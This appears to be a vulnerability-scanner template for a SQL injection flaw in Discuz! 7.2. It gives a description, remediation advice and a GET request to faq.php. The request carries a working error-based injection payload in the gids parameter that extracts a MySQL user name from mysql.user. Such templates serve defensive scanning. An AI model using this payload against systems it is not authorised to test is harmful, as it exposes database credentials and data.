id: Discuz-V72-SQLi
info:
  name: Discuz7.2 SQL injection vulnerability
  author:
  - l0ne1y
  description: |-
    Discuz! v7.2 SQL injection vulnerability.
    Discuz! is a generic community forum software system.

    Discuz! v7.2 has an SQL injection vulnerability. An attacker can exploit it to execute SQL statements and view, add, modify, or delete information in the database.
  severity: high
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://discuz.net/

    Temporary Fix:
    1. Use prepared statements. When using PDO, be careful not to concatenate variables directly into PDO statements. All queries should use the parameterized query interface provided by the database; parameterized statements use parameters instead of embedding user-input variables into SQL statements. Virtually all database systems provide a parameterized SQL execution interface, which can very effectively prevent SQL injection attacks.
    2. Escape special characters (such as '"<>&*;) entering the database, or perform encoding conversion.
    3. Strictly enforce data length limits, which to some degree prevents long SQL injection statements from executing correctly.
    4. Strictly limit the database privileges of the website user, granting only the privileges needed to perform their work, thereby minimizing the damage injection attacks can cause to the database.
    5. Avoid displaying SQL error messages, such as type errors or field mismatches, to prevent attackers from using such error information for reconnaissance.
    6. Filter dangerous characters; for example, use regular expressions to match keywords such as union, sleep, and, select, and load_file, and stop execution if matched.
requests:
- matchers:
  - type: word
    condition: and
    words:
    - 81dc9bdb52d04dc20036dbd8313ed055
    - 'Discuz! info</b>: MySQL Query Error'
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23'
  method: GET
